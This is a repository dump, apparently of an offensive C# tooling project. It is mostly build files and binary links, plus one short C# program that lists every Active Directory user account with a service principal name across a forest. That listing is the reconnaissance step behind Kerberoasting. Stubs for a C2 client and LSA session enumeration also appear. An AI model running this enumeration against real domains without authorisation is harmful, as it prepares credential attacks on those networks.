"{8E7F288D-DB6A-405E-BCBE-EC0CA0C8E6F5}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {8E7F288D-DB6A-405E-BCBE-EC0CA0C8E6F5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {8E7F288D-DB6A-405E-BCBE-EC0CA0C8E6F5}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {8E7F288D-DB6A-405E-BCBE-EC0CA0C8E6F5}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {8E7F288D-DB6A-405E-BCBE-EC0CA0C8E6F5}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {6D78D62E-D07F-4400-A95F-2DDA3F66A95E} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/Class1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.DirectoryServices.AccountManagement; 3 | using System.DirectoryServices; 4 | using System.DirectoryServices.ActiveDirectory; 5 | using System.Collections; 6 | 7 | namespace GetUsersSPN 8 | { 9 | public class Class1 10 | { 11 | public void GetSPNs() 12 | { 13 | Forest f = Forest.GetCurrentForest(); 14 | DomainCollection dcs = f.Domains; 15 | ArrayList domains = new ArrayList(); 16 | 17 | foreach(Domain d in dcs) 18 | { 19 | domains.Add(d.Name.ToString()); 20 | 21 | string domainName = d.Name.ToString(); 22 | string[] dn = domainName.Split('.'); 23 | for(int i = 0; i < dn.Length; i++) 24 | { 25 | dn[i] = "DC=" + dn[i]; 26 | //Console.WriteLine(dn[i]); 27 | } 28 | 29 | DirectoryEntry de = new DirectoryEntry(String.Format("LDAP://{0}", String.Join(",", dn))); 30 | 31 | DirectorySearcher ds = new DirectorySearcher(); 32 | ds.SearchRoot = de; 33 | ds.Filter = "(&(objectclass=user)(serviceprincipalname=*))"; 34 | 35 | foreach(SearchResult sr in ds.FindAll()) 36 | { 37 | Console.WriteLine("User: {0} from the Domain: {1}",sr.Properties["samaccountname"][0],domainName); 38 | Console.WriteLine("SPN: {0}",sr.Properties["serviceprincipalname"][0]); 39 | Console.WriteLine(); 40 | } 41 | 42 | 43 | } 44 | 45 | } 46 | public static void Main(string[] args) 47 | { 48 | try 49 | { 50 | Class1 c = new Class1(); 51 | c.GetSPNs(); 52 | } 53 | catch { } 54 | } 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/GetUsersSPN.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | net48 5 | 6 | Exe 7 | 8 | 9 | 10 | 11 | true 12 | full 13 | true 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/bin/Debug/net48/GetUsersSPN.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/GetUsersSPN/bin/Debug/net48/GetUsersSPN.exe -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/bin/Debug/net48/GetUsersSPN.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/bin/Debug/net48/GetUsersSPN.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/GetUsersSPN/bin/Debug/net48/GetUsersSPN.pdb -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/net48/GetUsersSPN.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | using System; 12 | using System.Reflection; 13 | 14 | [assembly: System.Reflection.AssemblyCompanyAttribute("GetUsersSPN")] 15 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")] 16 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 17 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 18 | [assembly: System.Reflection.AssemblyProductAttribute("GetUsersSPN")] 19 | [assembly: System.Reflection.AssemblyTitleAttribute("GetUsersSPN")] 20 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 21 | 22 | // Generated by the MSBuild WriteCodeFragment class. 23 | 24 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/net48/GetUsersSPN.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | e7280f784d8a3d7581107ba56afa1df99f65ff72 2 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/net48/GetUsersSPN.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/net48/GetUsersSPN.assets.cache -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/net48/GetUsersSPN.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\GetUsersSPN\GetUsersSPN\obj\Debug\net48\GetUsersSPN.csprojAssemblyReference.cache 2 | C:\Users\stargirl\source\repos\GetUsersSPN\GetUsersSPN\obj\Debug\net48\GetUsersSPN.AssemblyInfoInputs.cache 3 | C:\Users\stargirl\source\repos\GetUsersSPN\GetUsersSPN\obj\Debug\net48\GetUsersSPN.AssemblyInfo.cs 4 | C:\Users\stargirl\source\repos\GetUsersSPN\GetUsersSPN\bin\Debug\net48\GetUsersSPN.exe.config 5 | C:\Users\stargirl\source\repos\GetUsersSPN\GetUsersSPN\bin\Debug\net48\GetUsersSPN.exe 6 | C:\Users\stargirl\source\repos\GetUsersSPN\GetUsersSPN\bin\Debug\net48\GetUsersSPN.pdb 7 | C:\Users\stargirl\source\repos\GetUsersSPN\GetUsersSPN\obj\Debug\net48\GetUsersSPN.exe 8 | C:\Users\stargirl\source\repos\GetUsersSPN\GetUsersSPN\obj\Debug\net48\GetUsersSPN.pdb 9 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/net48/GetUsersSPN.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/net48/GetUsersSPN.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/net48/GetUsersSPN.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/net48/GetUsersSPN.exe -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/net48/GetUsersSPN.exe.withSupportedRuntime.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/net48/GetUsersSPN.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/net48/GetUsersSPN.pdb -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/netstandard2.0/GetUsersSPN.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | using System; 12 | using System.Reflection; 13 | 14 | [assembly: System.Reflection.AssemblyCompanyAttribute("GetUsersSPN")] 15 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")] 16 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 17 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 18 | [assembly: System.Reflection.AssemblyProductAttribute("GetUsersSPN")] 19 | [assembly: System.Reflection.AssemblyTitleAttribute("GetUsersSPN")] 20 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 21 | 22 | // Generated by the MSBuild WriteCodeFragment class. 23 | 24 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/netstandard2.0/GetUsersSPN.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | e7280f784d8a3d7581107ba56afa1df99f65ff72 2 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/netstandard2.0/GetUsersSPN.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/netstandard2.0/GetUsersSPN.assets.cache -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/netstandard2.0/GetUsersSPN.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/Debug/netstandard2.0/GetUsersSPN.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/GetUsersSPN.csproj.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 1, 3 | "dgSpecHash": "Q4oKCb6V1QFiR7VaqhBvA/3TGNx/vytv8UcGXCLAEIlB8yFmq9gn8IZphROOc6BtiDzqIClsk60W6rGcnNS2zQ==", 4 | "success": true 5 | } -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/GetUsersSPN.csproj.nuget.dgspec.json: -------------------------------------------------------------------------------- 1 | { 2 | "format": 1, 3 | "restore": { 4 | "C:\\Users\\stargirl\\source\\repos\\GetUsersSPN\\GetUsersSPN\\GetUsersSPN.csproj": {} 5 | }, 6 | "projects": { 7 | "C:\\Users\\stargirl\\source\\repos\\GetUsersSPN\\GetUsersSPN\\GetUsersSPN.csproj": { 8 | "version": "1.0.0", 9 | "restore": { 10 | "projectUniqueName": "C:\\Users\\stargirl\\source\\repos\\GetUsersSPN\\GetUsersSPN\\GetUsersSPN.csproj", 11 | "projectName": "GetUsersSPN", 12 | "projectPath": "C:\\Users\\stargirl\\source\\repos\\GetUsersSPN\\GetUsersSPN\\GetUsersSPN.csproj", 13 | "packagesPath": "C:\\Users\\stargirl\\.nuget\\packages\\", 14 | "outputPath": "C:\\Users\\stargirl\\source\\repos\\GetUsersSPN\\GetUsersSPN\\obj\\", 15 | "projectStyle": "PackageReference", 16 | "configFilePaths": [ 17 | "C:\\Users\\stargirl\\AppData\\Roaming\\NuGet\\NuGet.Config", 18 | "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config" 19 | ], 20 | "originalTargetFrameworks": [ 21 | "net48" 22 | ], 23 | "sources": { 24 | "C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {}, 25 | "https://api.nuget.org/v3/index.json": {} 26 | }, 27 | "frameworks": { 28 | "net48": { 29 | "projectReferences": {} 30 | } 31 | }, 32 | "warningProperties": { 33 | "warnAsError": [ 34 | "NU1605" 35 | ] 36 | } 37 | }, 38 | "frameworks": { 39 | "net48": { 40 | "runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\3.0.100\\RuntimeIdentifierGraph.json" 41 | } 42 | }, 43 | "runtimes": { 44 | "win7-x86": { 45 | "#import": [] 46 | } 47 | } 48 | } 49 | } 50 | } -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/GetUsersSPN.csproj.nuget.g.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | True 5 | NuGet 6 | $(MSBuildThisFileDirectory)project.assets.json 7 | $(UserProfile)\.nuget\packages\ 8 | C:\Users\stargirl\.nuget\packages\ 9 | PackageReference 10 | 5.3.0 11 | 12 | 13 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 14 | 15 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/GetUsersSPN.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN/obj/project.assets.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": 3, 3 | "targets": { 4 | ".NETFramework,Version=v4.8": {}, 5 | ".NETFramework,Version=v4.8/win7-x86": {} 6 | }, 7 | "libraries": {}, 8 | "projectFileDependencyGroups": { 9 | ".NETFramework,Version=v4.8": [] 10 | }, 11 | "packageFolders": { 12 | "C:\\Users\\stargirl\\.nuget\\packages\\": {} 13 | }, 14 | "project": { 15 | "version": "1.0.0", 16 | "restore": { 17 | "projectUniqueName": "C:\\Users\\stargirl\\source\\repos\\GetUsersSPN\\GetUsersSPN\\GetUsersSPN.csproj", 18 | "projectName": "GetUsersSPN", 19 | "projectPath": "C:\\Users\\stargirl\\source\\repos\\GetUsersSPN\\GetUsersSPN\\GetUsersSPN.csproj", 20 | "packagesPath": "C:\\Users\\stargirl\\.nuget\\packages\\", 21 | "outputPath": "C:\\Users\\stargirl\\source\\repos\\GetUsersSPN\\GetUsersSPN\\obj\\", 22 | "projectStyle": "PackageReference", 23 | "configFilePaths": [ 24 | "C:\\Users\\stargirl\\AppData\\Roaming\\NuGet\\NuGet.Config", 25 | "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config" 26 | ], 27 | "originalTargetFrameworks": [ 28 | "net48" 29 | ], 30 | "sources": { 31 | "C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {}, 32 | "https://api.nuget.org/v3/index.json": {} 33 | }, 34 | "frameworks": { 35 | "net48": { 36 | "projectReferences": {} 37 | } 38 | }, 39 | "warningProperties": { 40 | "warnAsError": [ 41 | "NU1605" 42 | ] 43 | } 44 | }, 45 | "frameworks": { 46 | "net48": { 47 | "runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\3.0.100\\RuntimeIdentifierGraph.json" 48 | } 49 | }, 50 | "runtimes": { 51 | "win7-x86": { 52 | "#import": [] 53 | } 54 | } 55 | } 56 | } -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/.vs/LsaEnumerateLoggedonSessions/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/LSA API/LSAEnumerateLogonSessions/.vs/LsaEnumerateLoggedonSessions/v16/.suo -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/.vs/LsaEnumerateLoggedonSessions/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/LSA API/LSAEnumerateLogonSessions/.vs/LsaEnumerateLoggedonSessions/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/.vs/LsaEnumerateLoggedonSessions/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/LSA API/LSAEnumerateLogonSessions/.vs/LsaEnumerateLoggedonSessions/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LsaEnumerateLoggedonSessions", "LsaEnumerateLoggedonSessions\LsaEnumerateLoggedonSessions.csproj", "{2979AB10-340F-4CE0-81BC-971931700FAD}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {2979AB10-340F-4CE0-81BC-971931700FAD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {2979AB10-340F-4CE0-81BC-971931700FAD}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {2979AB10-340F-4CE0-81BC-971931700FAD}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {2979AB10-340F-4CE0-81BC-971931700FAD}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {A23EAD52-C2DE-4DF0-ADC4-D58B7A83E60A} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("LsaEnumerateLoggedonSessions")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("LsaEnumerateLoggedonSessions")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("2979ab10-340f-4ce0-81bc-971931700fad")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/bin/Debug/LsaEnumerateLoggedonSessions.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/bin/Debug/LsaEnumerateLoggedonSessions.exe -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/bin/Debug/LsaEnumerateLoggedonSessions.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/bin/Debug/LsaEnumerateLoggedonSessions.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/bin/Debug/LsaEnumerateLoggedonSessions.pdb -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/obj/Debug/LsaEnumerateLoggedonSessions.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\WinAPI\LSAAPI\LsaEnumerateLoggedonSessions\LsaEnumerateLoggedonSessions\bin\Debug\LsaEnumerateLoggedonSessions.exe.config 2 | C:\Users\stargirl\source\repos\WinAPI\LSAAPI\LsaEnumerateLoggedonSessions\LsaEnumerateLoggedonSessions\bin\Debug\LsaEnumerateLoggedonSessions.exe 3 | C:\Users\stargirl\source\repos\WinAPI\LSAAPI\LsaEnumerateLoggedonSessions\LsaEnumerateLoggedonSessions\bin\Debug\LsaEnumerateLoggedonSessions.pdb 4 | C:\Users\stargirl\source\repos\WinAPI\LSAAPI\LsaEnumerateLoggedonSessions\LsaEnumerateLoggedonSessions\obj\Debug\LsaEnumerateLoggedonSessions.exe 5 | C:\Users\stargirl\source\repos\WinAPI\LSAAPI\LsaEnumerateLoggedonSessions\LsaEnumerateLoggedonSessions\obj\Debug\LsaEnumerateLoggedonSessions.pdb 6 | -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/obj/Debug/LsaEnumerateLoggedonSessions.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/obj/Debug/LsaEnumerateLoggedonSessions.exe -------------------------------------------------------------------------------- /Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/obj/Debug/LsaEnumerateLoggedonSessions.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/LSA API/LSAEnumerateLogonSessions/LsaEnumerateLoggedonSessions/obj/Debug/LsaEnumerateLoggedonSessions.pdb -------------------------------------------------------------------------------- /C2Client/.vs/C2Client/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/.vs/C2Client/v16/.suo -------------------------------------------------------------------------------- /C2Client/.vs/C2Client/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/.vs/C2Client/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /C2Client/.vs/C2Client/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/.vs/C2Client/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /C2Client/.vs/C2Client/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/.vs/C2Client/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /C2Client/.vs/C2Client/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/.vs/C2Client/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /C2Client/C2Client.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "C2Client", "C2Client\C2Client.csproj", "{CF306FE7-16FF-4833-9695-EB2DF6CE0006}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {CF306FE7-16FF-4833-9695-EB2DF6CE0006}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {CF306FE7-16FF-4833-9695-EB2DF6CE0006}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {CF306FE7-16FF-4833-9695-EB2DF6CE0006}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {CF306FE7-16FF-4833-9695-EB2DF6CE0006}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {80632EA2-88BE-4349-A84E-A58579B55049} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /C2Client/C2Client/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /C2Client/C2Client/C2Client.csproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 127.0.0.1 1234 126.0.0.1 8080 5 | 6 | -------------------------------------------------------------------------------- /C2Client/C2Client/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("C2Client")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("C2Client")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("cf306fe7-16ff-4833-9695-eb2df6ce0006")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /C2Client/C2Client/bin/Debug/C2Client.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/C2Client/bin/Debug/C2Client.exe -------------------------------------------------------------------------------- /C2Client/C2Client/bin/Debug/C2Client.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /C2Client/C2Client/bin/Debug/C2Client.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/C2Client/bin/Debug/C2Client.pdb -------------------------------------------------------------------------------- /C2Client/C2Client/bin/Debug/New folder/flag.txt: -------------------------------------------------------------------------------- 